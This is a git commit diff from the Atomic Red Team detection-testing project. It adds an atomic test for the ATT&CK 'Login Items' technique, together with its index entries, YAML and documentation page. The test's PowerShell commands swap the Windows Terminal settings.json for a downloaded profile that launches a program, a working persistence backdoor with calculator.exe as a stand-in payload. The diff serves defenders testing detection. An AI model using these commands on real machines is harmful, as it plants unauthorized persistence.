Generated docs from job=generate-docs branch=master [ci skip]

2022-08-19 14:59:44 +00:00
parent b29654f477
commit 40b77d6380
7 changed files with 172 additions and 8 deletions
@@ -517,6 +517,7 @@ privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt
 privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 privilege-escalation,T1546.009,AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
+privilege-escalation,T1547.015,Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
 privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
@@ -743,6 +744,7 @@ persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fc
 persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
 persistence,T1546.009,AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
+persistence,T1547.015,Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
 persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
 persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
 persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
@@ -800,7 +800,8 @@
 - [T1546.009 AppCert DLLs](../../T1546.009/T1546.009.md)
  - Atomic Test #1: Create registry persistence via AppCert DLL [windows]
 - T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.015 Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547.015 Login Items](../../T1547.015/T1547.015.md)
+  - Atomic Test #1: Persistence by modifying Windows Terminal profile [windows]
 - [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
  - Atomic Test #1: Named pipe client impersonation [windows]
  - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
@@ -1238,7 +1239,8 @@
  - Atomic Test #1: Create registry persistence via AppCert DLL [windows]
 - T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.015 Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547.015 Login Items](../../T1547.015/T1547.015.md)
+  - Atomic Test #1: Persistence by modifying Windows Terminal profile [windows]
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
  - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
@@ -65,7 +65,7 @@
 |  |  | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [AppCert DLLs](../../T1546.009/T1546.009.md) | Network Address Translation Traversal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | [Trap](../../T1546.005/T1546.005.md) | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [NTDS](../../T1003.003/T1003.003.md) |  |  |  |  |  |  |
+|  |  | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Login Items](../../T1547.015/T1547.015.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [NTDS](../../T1003.003/T1003.003.md) |  |  |  |  |  |  |
 |  |  | [Local Account](../../T1136.001/T1136.001.md) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) |  |  |  |  |  |  |
 |  |  | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [DCSync](../../T1003.006/T1003.006.md) |  |  |  |  |  |  |
 |  |  | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
@@ -91,7 +91,7 @@
 |  |  | [AppCert DLLs](../../T1546.009/T1546.009.md) | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SID-History Injection](../../T1134.005/T1134.005.md) | Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | [Odbcconf](../../T1218.008/T1218.008.md) |  |  |  |  |  |  |  |
+|  |  | [Login Items](../../T1547.015/T1547.015.md) | [Authentication Package](../../T1547.002/T1547.002.md) | [Odbcconf](../../T1218.008/T1218.008.md) |  |  |  |  |  |  |  |
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Gatekeeper Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -34482,7 +34482,53 @@ privilege-escalation:
      - 'File: File Modification'
      x_mitre_permissions_required:
      - User
-    atomic_tests: []
+      identifier: T1547.015
+    atomic_tests:
+    - name: Persistence by modifying Windows Terminal profile
+      auto_generated_guid: ec5d76ef-82fe-48da-b931-bdb25a62bc65
+      description: Modify Windows Terminal settings.json file to gain persistence.
+        [Twitter Post](https://twitter.com/nas_bench/status/1550836225652686848)
+      supported_platforms:
+      - windows
+      input_arguments:
+        calculator:
+          description: Test program used to imitate a maliciously called program.
+          type: String
+          default: calculator.exe
+        settings_json_def:
+          description: Default file for Windows Terminal to replace the default profile
+            with a backdoor to call another program.
+          type: Path
+          default: "~\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\LocalState\\settings.json"
+        settings_json_tmp:
+          description: Temp file for Windows Terminal.
+          type: Path
+          default: "~\\AppData\\Local\\Temp\\settings.json"
+        wt_exe:
+          description: Windows Terminal executable.
+          type: Path
+          default: "~\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\wt.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Windows Terminal must be installed
+
+          '
+        prereq_command: 'if (Test-Path #{wt_exe}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: '$(rm ~\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalState\StoreEdgeFD\installed.db
+          -ErrorAction Ignore; Write-Output ""; $?) -and $(winget install --id=Microsoft.WindowsTerminal)
+
+          '
+      executor:
+        command: |
+          mv #{settings_json_def} #{settings_json_tmp}
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/src/settings.json?raw=true" -OutFile "#{settings_json_def}"
+          wt.exe
+        cleanup_command: |
+          mv -Force #{settings_json_tmp} #{settings_json_def}
+          taskkill /F /IM "#{calculator}" > $null
+        name: powershell
  T1134.001:
    technique:
      x_mitre_platforms:
@@ -56028,7 +56074,53 @@ persistence:
      - 'File: File Modification'
      x_mitre_permissions_required:
      - User
-    atomic_tests: []
+      identifier: T1547.015
+    atomic_tests:
+    - name: Persistence by modifying Windows Terminal profile
+      auto_generated_guid: ec5d76ef-82fe-48da-b931-bdb25a62bc65
+      description: Modify Windows Terminal settings.json file to gain persistence.
+        [Twitter Post](https://twitter.com/nas_bench/status/1550836225652686848)
+      supported_platforms:
+      - windows
+      input_arguments:
+        calculator:
+          description: Test program used to imitate a maliciously called program.
+          type: String
+          default: calculator.exe
+        settings_json_def:
+          description: Default file for Windows Terminal to replace the default profile
+            with a backdoor to call another program.
+          type: Path
+          default: "~\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\LocalState\\settings.json"
+        settings_json_tmp:
+          description: Temp file for Windows Terminal.
+          type: Path
+          default: "~\\AppData\\Local\\Temp\\settings.json"
+        wt_exe:
+          description: Windows Terminal executable.
+          type: Path
+          default: "~\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\wt.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Windows Terminal must be installed
+
+          '
+        prereq_command: 'if (Test-Path #{wt_exe}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: '$(rm ~\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalState\StoreEdgeFD\installed.db
+          -ErrorAction Ignore; Write-Output ""; $?) -and $(winget install --id=Microsoft.WindowsTerminal)
+
+          '
+      executor:
+        command: |
+          mv #{settings_json_def} #{settings_json_tmp}
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/src/settings.json?raw=true" -OutFile "#{settings_json_def}"
+          wt.exe
+        cleanup_command: |
+          mv -Force #{settings_json_tmp} #{settings_json_def}
+          taskkill /F /IM "#{calculator}" > $null
+        name: powershell
  T1205.001:
    technique:
      x_mitre_platforms:
@@ -0,0 +1,68 @@
+# T1547.015 - Login Items
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1547/015)
+<blockquote>Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
+
+Login items installed using the Service Management Framework leverage <code>launchd</code>, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.
+
+Adversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as <code>tell application “System Events” to make login item at end with properties /path/to/executable</code>.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in <code>~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm</code>.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Persistence by modifying Windows Terminal profile](#atomic-test-1---persistence-by-modifying-windows-terminal-profile)
+
+
+<br/>
+
+## Atomic Test #1 - Persistence by modifying Windows Terminal profile
+Modify Windows Terminal settings.json file to gain persistence. [Twitter Post](https://twitter.com/nas_bench/status/1550836225652686848)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ec5d76ef-82fe-48da-b931-bdb25a62bc65
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| calculator | Test program used to imitate a maliciously called program. | String | calculator.exe|
+| settings_json_def | Default file for Windows Terminal to replace the default profile with a backdoor to call another program. | Path | ~&#92;AppData&#92;Local&#92;Packages&#92;Microsoft.WindowsTerminal_8wekyb3d8bbwe&#92;LocalState&#92;settings.json|
+| settings_json_tmp | Temp file for Windows Terminal. | Path | ~&#92;AppData&#92;Local&#92;Temp&#92;settings.json|
+| wt_exe | Windows Terminal executable. | Path | ~&#92;AppData&#92;Local&#92;Microsoft&#92;WindowsApps&#92;Microsoft.WindowsTerminal_8wekyb3d8bbwe&#92;wt.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+mv #{settings_json_def} #{settings_json_tmp}
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/src/settings.json?raw=true" -OutFile "#{settings_json_def}"
+wt.exe
+```
+
+#### Cleanup Commands:
+```powershell
+mv -Force #{settings_json_tmp} #{settings_json_def}
+taskkill /F /IM "#{calculator}" > $null
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Windows Terminal must be installed
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{wt_exe}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+$(rm ~\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalState\StoreEdgeFD\installed.db -ErrorAction Ignore; Write-Output ""; $?) -and $(winget install --id=Microsoft.WindowsTerminal)
+```
+
+
+
+
+<br/>